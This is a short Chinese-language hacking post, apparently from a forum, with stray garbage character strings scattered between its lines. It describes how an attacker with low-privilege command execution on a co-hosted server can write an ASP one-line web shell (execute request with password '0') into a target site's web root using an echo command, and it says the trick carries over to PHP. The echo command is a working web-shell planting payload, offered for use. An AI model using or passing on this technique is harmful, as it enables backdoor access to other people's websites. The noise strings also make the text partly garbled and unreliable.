在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。0 ~* f0 j$ y. Y) ^5 d
( b" v. u& f) ?/ y0 L命令格式
% r7 ^& l' y& b- O) R, K' D
4 d" \! \- t% N& G! D4 E6 _- G- Z' nEcho 语句 >目标站绝对目录5 c i! _, J- u! `8 k
: p' k) n+ ^4 F r1 O/ z) z8 C
例如: # }9 ~& P# W X. t, j! G
' Q; r' `4 F$ u+ a$ becho ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp$ f8 F+ i" X& p# h
; h! b! R ~* s+ T R& K
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
' c2 @5 D7 i$ o- l. \9 s |